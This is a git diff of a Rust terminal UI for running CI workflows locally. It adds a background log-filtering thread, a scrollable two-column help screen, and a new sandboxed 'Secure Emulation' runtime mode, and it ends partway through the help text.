} else if app.selected_tab == 0 {
|
||||
app.next_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
// App state for the UI
|
||||
use crate::log_processor::{LogProcessingRequest, LogProcessor, ProcessedLogEntry};
|
||||
use crate::models::{
|
||||
ExecutionResultMsg, JobExecution, LogFilterLevel, StepExecution, Workflow, WorkflowExecution,
|
||||
WorkflowStatus,
|
||||
@@ -40,6 +41,15 @@ pub struct App {
|
||||
pub log_filter_level: Option<LogFilterLevel>, // Current log level filter
|
||||
pub log_search_matches: Vec<usize>, // Indices of logs that match the search
|
||||
pub log_search_match_idx: usize, // Current match index for navigation
|
||||
|
||||
// Help tab scrolling
|
||||
pub help_scroll: usize, // Scrolling position for help content
|
||||
|
||||
// Background log processing
|
||||
pub log_processor: LogProcessor,
|
||||
pub processed_logs: Vec<ProcessedLogEntry>,
|
||||
pub logs_need_update: bool, // Flag to trigger log processing
|
||||
pub last_system_logs_count: usize, // Track system log changes
|
||||
}
|
||||
|
||||
impl App {
|
||||
@@ -168,6 +178,7 @@ impl App {
|
||||
}
|
||||
}
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
};
|
||||
|
||||
App {
|
||||
@@ -199,6 +210,13 @@ impl App {
|
||||
log_filter_level: Some(LogFilterLevel::All),
|
||||
log_search_matches: Vec::new(),
|
||||
log_search_match_idx: 0,
|
||||
help_scroll: 0,
|
||||
|
||||
// Background log processing
|
||||
log_processor: LogProcessor::new(),
|
||||
processed_logs: Vec::new(),
|
||||
logs_need_update: true,
|
||||
last_system_logs_count: 0,
|
||||
}
|
||||
}
|
||||
|
||||
@@ -214,7 +232,8 @@ impl App {
|
||||
pub fn toggle_emulation_mode(&mut self) {
|
||||
self.runtime_type = match self.runtime_type {
|
||||
RuntimeType::Docker => RuntimeType::Podman,
|
||||
RuntimeType::Podman => RuntimeType::Emulation,
|
||||
RuntimeType::Podman => RuntimeType::SecureEmulation,
|
||||
RuntimeType::SecureEmulation => RuntimeType::Emulation,
|
||||
RuntimeType::Emulation => RuntimeType::Docker,
|
||||
};
|
||||
self.logs
|
||||
@@ -238,7 +257,8 @@ impl App {
|
||||
match self.runtime_type {
|
||||
RuntimeType::Docker => "Docker",
|
||||
RuntimeType::Podman => "Podman",
|
||||
RuntimeType::Emulation => "Emulation",
|
||||
RuntimeType::SecureEmulation => "Secure Emulation",
|
||||
RuntimeType::Emulation => "Emulation (Unsafe)",
|
||||
}
|
||||
}
|
||||
|
||||
@@ -429,10 +449,9 @@ impl App {
|
||||
if let Some(idx) = self.workflow_list_state.selected() {
|
||||
if idx < self.workflows.len() && !self.execution_queue.contains(&idx) {
|
||||
self.execution_queue.push(idx);
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
self.logs.push(format!(
|
||||
"[{}] Added '{}' to execution queue. Press 'Enter' to start.",
|
||||
timestamp, self.workflows[idx].name
|
||||
self.add_timestamped_log(&format!(
|
||||
"Added '{}' to execution queue. Press 'Enter' to start.",
|
||||
self.workflows[idx].name
|
||||
));
|
||||
}
|
||||
}
|
||||
@@ -635,10 +654,11 @@ impl App {
|
||||
self.log_search_active = false;
|
||||
self.log_search_query.clear();
|
||||
self.log_search_matches.clear();
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
KeyCode::Backspace => {
|
||||
self.log_search_query.pop();
|
||||
self.update_log_search_matches();
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
KeyCode::Enter => {
|
||||
self.log_search_active = false;
|
||||
@@ -646,7 +666,7 @@ impl App {
|
||||
}
|
||||
KeyCode::Char(c) => {
|
||||
self.log_search_query.push(c);
|
||||
self.update_log_search_matches();
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
@@ -658,8 +678,8 @@ impl App {
|
||||
if !self.log_search_active {
|
||||
// Don't clear the query, this allows toggling the search UI while keeping the filter
|
||||
} else {
|
||||
// When activating search, update matches
|
||||
self.update_log_search_matches();
|
||||
// When activating search, trigger update
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
}
|
||||
|
||||
@@ -670,8 +690,8 @@ impl App {
|
||||
Some(level) => Some(level.next()),
|
||||
};
|
||||
|
||||
// Update search matches when filter changes
|
||||
self.update_log_search_matches();
|
||||
// Trigger log processing update when filter changes
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
// Clear log search and filter
|
||||
@@ -680,6 +700,7 @@ impl App {
|
||||
self.log_filter_level = None;
|
||||
self.log_search_matches.clear();
|
||||
self.log_search_match_idx = 0;
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
// Update matches based on current search and filter
|
||||
@@ -790,6 +811,18 @@ impl App {
|
||||
}
|
||||
}
|
||||
|
||||
// Scroll help content up
|
||||
pub fn scroll_help_up(&mut self) {
|
||||
self.help_scroll = self.help_scroll.saturating_sub(1);
|
||||
}
|
||||
|
||||
// Scroll help content down
|
||||
pub fn scroll_help_down(&mut self) {
|
||||
// The help content has a fixed number of lines, so we set a reasonable max
|
||||
const MAX_HELP_SCROLL: usize = 30; // Adjust based on help content length
|
||||
self.help_scroll = (self.help_scroll + 1).min(MAX_HELP_SCROLL);
|
||||
}
|
||||
|
||||
// Update progress for running workflows
|
||||
pub fn update_running_workflow_progress(&mut self) {
|
||||
if let Some(idx) = self.current_execution {
|
||||
@@ -955,4 +988,82 @@ impl App {
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Request log processing update from background thread
|
||||
pub fn request_log_processing_update(&mut self) {
|
||||
let request = LogProcessingRequest {
|
||||
search_query: self.log_search_query.clone(),
|
||||
filter_level: self.log_filter_level.clone(),
|
||||
app_logs: self.logs.clone(),
|
||||
app_logs_count: self.logs.len(),
|
||||
system_logs_count: wrkflw_logging::get_logs().len(),
|
||||
};
|
||||
|
||||
if self.log_processor.request_update(request).is_err() {
|
||||
// Log processor channel disconnected, recreate it
|
||||
self.log_processor = LogProcessor::new();
|
||||
self.logs_need_update = true;
|
||||
}
|
||||
}
|
||||
|
||||
/// Check for and apply log processing updates
|
||||
pub fn check_log_processing_updates(&mut self) {
|
||||
// Check if system logs have changed
|
||||
let current_system_logs_count = wrkflw_logging::get_logs().len();
|
||||
if current_system_logs_count != self.last_system_logs_count {
|
||||
self.last_system_logs_count = current_system_logs_count;
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
if let Some(response) = self.log_processor.try_get_update() {
|
||||
self.processed_logs = response.processed_logs;
|
||||
self.log_search_matches = response.search_matches;
|
||||
|
||||
// Update scroll position to first match if we have search results
|
||||
if !self.log_search_matches.is_empty() && !self.log_search_query.is_empty() {
|
||||
self.log_search_match_idx = 0;
|
||||
if let Some(&idx) = self.log_search_matches.first() {
|
||||
self.log_scroll = idx;
|
||||
}
|
||||
}
|
||||
|
||||
self.logs_need_update = false;
|
||||
}
|
||||
}
|
||||
|
||||
/// Trigger log processing when search/filter changes
|
||||
pub fn mark_logs_for_update(&mut self) {
|
||||
self.logs_need_update = true;
|
||||
self.request_log_processing_update();
|
||||
}
|
||||
|
||||
/// Get combined app and system logs for background processing
|
||||
pub fn get_combined_logs(&self) -> Vec<String> {
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Add app logs
|
||||
for log in &self.logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Add system logs
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
all_logs
|
||||
}
|
||||
|
||||
/// Add a log entry and trigger log processing update
|
||||
pub fn add_log(&mut self, message: String) {
|
||||
self.logs.push(message);
|
||||
self.mark_logs_for_update();
|
||||
}
|
||||
|
||||
/// Add a formatted log entry with timestamp and trigger log processing update
|
||||
pub fn add_timestamped_log(&mut self, message: &str) {
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
let formatted_message = format!("[{}] {}", timestamp, message);
|
||||
self.add_log(formatted_message);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -122,6 +122,7 @@ pub async fn execute_workflow_cli(
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
@@ -454,6 +455,7 @@ pub fn start_next_workflow_execution(
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
|
||||
@@ -12,6 +12,7 @@
|
||||
pub mod app;
|
||||
pub mod components;
|
||||
pub mod handlers;
|
||||
pub mod log_processor;
|
||||
pub mod models;
|
||||
pub mod utils;
|
||||
pub mod views;
|
||||
|
||||
305
crates/ui/src/log_processor.rs
Normal file
305
crates/ui/src/log_processor.rs
Normal file
@@ -0,0 +1,305 @@
|
||||
// Background log processor for asynchronous log filtering and formatting
|
||||
use crate::models::LogFilterLevel;
|
||||
use ratatui::{
|
||||
style::{Color, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Cell, Row},
|
||||
};
|
||||
use std::sync::mpsc;
|
||||
use std::thread;
|
||||
use std::time::{Duration, Instant};
|
||||
|
||||
/// Processed log entry ready for rendering
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ProcessedLogEntry {
|
||||
pub timestamp: String,
|
||||
pub log_type: String,
|
||||
pub log_style: Style,
|
||||
pub content_spans: Vec<Span<'static>>,
|
||||
}
|
||||
|
||||
impl ProcessedLogEntry {
|
||||
/// Convert to a table row for rendering
|
||||
pub fn to_row(&self) -> Row<'static> {
|
||||
Row::new(vec![
|
||||
Cell::from(self.timestamp.clone()),
|
||||
Cell::from(self.log_type.clone()).style(self.log_style),
|
||||
Cell::from(Line::from(self.content_spans.clone())),
|
||||
])
|
||||
}
|
||||
}
|
||||
|
||||
/// Request to update log processing parameters
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct LogProcessingRequest {
|
||||
pub search_query: String,
|
||||
pub filter_level: Option<LogFilterLevel>,
|
||||
pub app_logs: Vec<String>, // Complete app logs
|
||||
pub app_logs_count: usize, // To detect changes in app logs
|
||||
pub system_logs_count: usize, // To detect changes in system logs
|
||||
}
|
||||
|
||||
/// Response with processed logs
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct LogProcessingResponse {
|
||||
pub processed_logs: Vec<ProcessedLogEntry>,
|
||||
pub total_log_count: usize,
|
||||
pub filtered_count: usize,
|
||||
pub search_matches: Vec<usize>, // Indices of logs that match search
|
||||
}
|
||||
|
||||
/// Background log processor
|
||||
pub struct LogProcessor {
|
||||
request_tx: mpsc::Sender<LogProcessingRequest>,
|
||||
response_rx: mpsc::Receiver<LogProcessingResponse>,
|
||||
_worker_handle: thread::JoinHandle<()>,
|
||||
}
|
||||
|
||||
impl LogProcessor {
|
||||
/// Create a new log processor with a background worker thread
|
||||
pub fn new() -> Self {
|
||||
let (request_tx, request_rx) = mpsc::channel::<LogProcessingRequest>();
|
||||
let (response_tx, response_rx) = mpsc::channel::<LogProcessingResponse>();
|
||||
|
||||
let worker_handle = thread::spawn(move || {
|
||||
Self::worker_loop(request_rx, response_tx);
|
||||
});
|
||||
|
||||
Self {
|
||||
request_tx,
|
||||
response_rx,
|
||||
_worker_handle: worker_handle,
|
||||
}
|
||||
}
|
||||
|
||||
/// Send a processing request (non-blocking)
|
||||
pub fn request_update(
|
||||
&self,
|
||||
request: LogProcessingRequest,
|
||||
) -> Result<(), mpsc::SendError<LogProcessingRequest>> {
|
||||
self.request_tx.send(request)
|
||||
}
|
||||
|
||||
/// Try to get the latest processed logs (non-blocking)
|
||||
pub fn try_get_update(&self) -> Option<LogProcessingResponse> {
|
||||
self.response_rx.try_recv().ok()
|
||||
}
|
||||
|
||||
/// Background worker loop
|
||||
fn worker_loop(
|
||||
request_rx: mpsc::Receiver<LogProcessingRequest>,
|
||||
response_tx: mpsc::Sender<LogProcessingResponse>,
|
||||
) {
|
||||
let mut last_request: Option<LogProcessingRequest> = None;
|
||||
let mut last_processed_time = Instant::now();
|
||||
let mut cached_logs: Vec<String> = Vec::new();
|
||||
let mut cached_app_logs_count = 0;
|
||||
let mut cached_system_logs_count = 0;
|
||||
|
||||
loop {
|
||||
// Check for new requests with a timeout to allow periodic processing
|
||||
let request = match request_rx.recv_timeout(Duration::from_millis(100)) {
|
||||
Ok(req) => Some(req),
|
||||
Err(mpsc::RecvTimeoutError::Timeout) => None,
|
||||
Err(mpsc::RecvTimeoutError::Disconnected) => break,
|
||||
};
|
||||
|
||||
// Update request if we received one
|
||||
if let Some(req) = request {
|
||||
last_request = Some(req);
|
||||
}
|
||||
|
||||
// Process if we have a request and enough time has passed since last processing
|
||||
if let Some(ref req) = last_request {
|
||||
let should_process = last_processed_time.elapsed() > Duration::from_millis(50)
|
||||
&& (cached_app_logs_count != req.app_logs_count
|
||||
|| cached_system_logs_count != req.system_logs_count
|
||||
|| cached_logs.is_empty());
|
||||
|
||||
if should_process {
|
||||
// Refresh log cache if log counts changed
|
||||
if cached_app_logs_count != req.app_logs_count
|
||||
|| cached_system_logs_count != req.system_logs_count
|
||||
|| cached_logs.is_empty()
|
||||
{
|
||||
cached_logs = Self::get_combined_logs(&req.app_logs);
|
||||
cached_app_logs_count = req.app_logs_count;
|
||||
cached_system_logs_count = req.system_logs_count;
|
||||
}
|
||||
|
||||
let response = Self::process_logs(&cached_logs, req);
|
||||
|
||||
if response_tx.send(response).is_err() {
|
||||
break; // Receiver disconnected
|
||||
}
|
||||
|
||||
last_processed_time = Instant::now();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Get combined app and system logs
|
||||
fn get_combined_logs(app_logs: &[String]) -> Vec<String> {
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Add app logs
|
||||
for log in app_logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Add system logs
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
all_logs
|
||||
}
|
||||
|
||||
/// Process logs according to search and filter criteria
|
||||
fn process_logs(all_logs: &[String], request: &LogProcessingRequest) -> LogProcessingResponse {
|
||||
// Filter logs based on search query and filter level
|
||||
let mut filtered_logs = Vec::new();
|
||||
let mut search_matches = Vec::new();
|
||||
|
||||
for (idx, log) in all_logs.iter().enumerate() {
|
||||
let passes_filter = match &request.filter_level {
|
||||
None => true,
|
||||
Some(level) => level.matches(log),
|
||||
};
|
||||
|
||||
let matches_search = if request.search_query.is_empty() {
|
||||
true
|
||||
} else {
|
||||
log.to_lowercase()
|
||||
.contains(&request.search_query.to_lowercase())
|
||||
};
|
||||
|
||||
if passes_filter && matches_search {
|
||||
filtered_logs.push((idx, log));
|
||||
if matches_search && !request.search_query.is_empty() {
|
||||
search_matches.push(filtered_logs.len() - 1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Process filtered logs into display format
|
||||
let processed_logs: Vec<ProcessedLogEntry> = filtered_logs
|
||||
.iter()
|
||||
.map(|(_, log_line)| Self::process_log_entry(log_line, &request.search_query))
|
||||
.collect();
|
||||
|
||||
LogProcessingResponse {
|
||||
processed_logs,
|
||||
total_log_count: all_logs.len(),
|
||||
filtered_count: filtered_logs.len(),
|
||||
search_matches,
|
||||
}
|
||||
}
|
||||
|
||||
/// Process a single log entry into display format
|
||||
fn process_log_entry(log_line: &str, search_query: &str) -> ProcessedLogEntry {
|
||||
// Extract timestamp from log format [HH:MM:SS]
|
||||
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let end = log_line.find(']').unwrap_or(0);
|
||||
if end > 1 {
|
||||
log_line[1..end].to_string()
|
||||
} else {
|
||||
"??:??:??".to_string()
|
||||
}
|
||||
} else {
|
||||
"??:??:??".to_string()
|
||||
};
|
||||
|
||||
// Determine log type and style
|
||||
let (log_type, log_style) =
|
||||
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
|
||||
{
|
||||
("ERROR", Style::default().fg(Color::Red))
|
||||
} else if log_line.contains("Warning")
|
||||
|| log_line.contains("warning")
|
||||
|| log_line.contains("⚠️")
|
||||
{
|
||||
("WARN", Style::default().fg(Color::Yellow))
|
||||
} else if log_line.contains("Success")
|
||||
|| log_line.contains("success")
|
||||
|| log_line.contains("✅")
|
||||
{
|
||||
("SUCCESS", Style::default().fg(Color::Green))
|
||||
} else if log_line.contains("Running")
|
||||
|| log_line.contains("running")
|
||||
|| log_line.contains("⟳")
|
||||
{
|
||||
("INFO", Style::default().fg(Color::Cyan))
|
||||
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
|
||||
("TRIG", Style::default().fg(Color::Magenta))
|
||||
} else {
|
||||
("INFO", Style::default().fg(Color::Gray))
|
||||
};
|
||||
|
||||
// Extract content after timestamp
|
||||
let content = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let start = log_line.find(']').unwrap_or(0) + 1;
|
||||
log_line[start..].trim()
|
||||
} else {
|
||||
log_line
|
||||
};
|
||||
|
||||
// Create content spans with search highlighting
|
||||
let content_spans = if !search_query.is_empty() {
|
||||
Self::highlight_search_matches(content, search_query)
|
||||
} else {
|
||||
vec![Span::raw(content.to_string())]
|
||||
};
|
||||
|
||||
ProcessedLogEntry {
|
||||
timestamp,
|
||||
log_type: log_type.to_string(),
|
||||
log_style,
|
||||
content_spans,
|
||||
}
|
||||
}
|
||||
|
||||
/// Highlight search matches in content
|
||||
fn highlight_search_matches(content: &str, search_query: &str) -> Vec<Span<'static>> {
|
||||
let mut spans = Vec::new();
|
||||
let lowercase_content = content.to_lowercase();
|
||||
let lowercase_query = search_query.to_lowercase();
|
||||
|
||||
if lowercase_content.contains(&lowercase_query) {
|
||||
let mut last_idx = 0;
|
||||
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
|
||||
let real_idx = last_idx + idx;
|
||||
|
||||
// Add text before match
|
||||
if real_idx > last_idx {
|
||||
spans.push(Span::raw(content[last_idx..real_idx].to_string()));
|
||||
}
|
||||
|
||||
// Add matched text with highlight
|
||||
let match_end = real_idx + search_query.len();
|
||||
spans.push(Span::styled(
|
||||
content[real_idx..match_end].to_string(),
|
||||
Style::default().bg(Color::Yellow).fg(Color::Black),
|
||||
));
|
||||
|
||||
last_idx = match_end;
|
||||
}
|
||||
|
||||
// Add remaining text after last match
|
||||
if last_idx < content.len() {
|
||||
spans.push(Span::raw(content[last_idx..].to_string()));
|
||||
}
|
||||
} else {
|
||||
spans.push(Span::raw(content.to_string()));
|
||||
}
|
||||
|
||||
spans
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for LogProcessor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
@@ -50,6 +50,7 @@ pub struct StepExecution {
|
||||
}
|
||||
|
||||
/// Log filter levels
|
||||
#[derive(Debug, Clone, PartialEq)]
|
||||
pub enum LogFilterLevel {
|
||||
Info,
|
||||
Warning,
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
// Help overlay rendering
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::Rect,
|
||||
layout::{Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Paragraph, Wrap},
|
||||
@@ -9,11 +9,22 @@ use ratatui::{
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the help tab
|
||||
pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect) {
|
||||
let help_text = vec![
|
||||
// Render the help tab with scroll support
|
||||
pub fn render_help_content(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
area: Rect,
|
||||
scroll_offset: usize,
|
||||
) {
|
||||
// Split the area into columns for better organization
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Horizontal)
|
||||
.constraints([Constraint::Percentage(50), Constraint::Percentage(50)].as_ref())
|
||||
.split(area);
|
||||
|
||||
// Left column content
|
||||
let left_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"Keyboard Controls",
|
||||
"🗂 NAVIGATION",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
@@ -21,35 +32,391 @@ pub fn render_help_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, area: Rect)
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Tab",
|
||||
"Tab / Shift+Tab",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Switch between tabs"),
|
||||
]),
|
||||
// More help text would follow...
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1-4 / w,x,l,h",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Jump to specific tab"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓ or k/j",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Navigate lists"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Enter",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select/View details"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Esc",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Back/Exit help"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🚀 WORKFLOW MANAGEMENT",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Space",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle workflow selection"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"r",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Run selected workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"a",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Deselect all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Shift+R",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Reset workflow status"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"t",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Trigger remote workflow"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🔧 EXECUTION MODES",
|
||||
Style::default()
|
||||
.fg(Color::Magenta)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"e",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle emulation mode"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"v",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle validation mode"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"Runtime Modes:",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Docker", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Container isolation (default)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Podman", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Rootless containers"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Emulation", Style::default().fg(Color::Red)),
|
||||
Span::raw(" - Process mode (UNSAFE)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Secure Emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" - Sandboxed processes"),
|
||||
]),
|
||||
];
|
||||
|
||||
let help_widget = Paragraph::new(help_text)
|
||||
// Right column content
|
||||
let right_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"📄 LOGS & SEARCH",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"s",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log search"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"f",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"c",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Clear search & filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Next search match"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Scroll logs/Navigate"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"ℹ️ TAB OVERVIEW",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1. Workflows",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Browse & select workflows"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View workflow files")]),
|
||||
Line::from(vec![Span::raw(" • Select multiple for batch execution")]),
|
||||
Line::from(vec![Span::raw(" • Trigger remote workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"2. Execution",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Monitor job progress"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View job status and details")]),
|
||||
Line::from(vec![Span::raw(" • Enter job details with Enter")]),
|
||||
Line::from(vec![Span::raw(" • Navigate step execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"3. Logs",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - View execution logs"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • Search and filter logs")]),
|
||||
Line::from(vec![Span::raw(" • Real-time log streaming")]),
|
||||
Line::from(vec![Span::raw(" • Navigate search results")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"4. Help",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - This comprehensive guide"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🎯 QUICK ACTIONS",
|
||||
Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"?",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle help overlay"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"q",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Quit application"),
|
||||
]),
|
||||
Line::from(""),
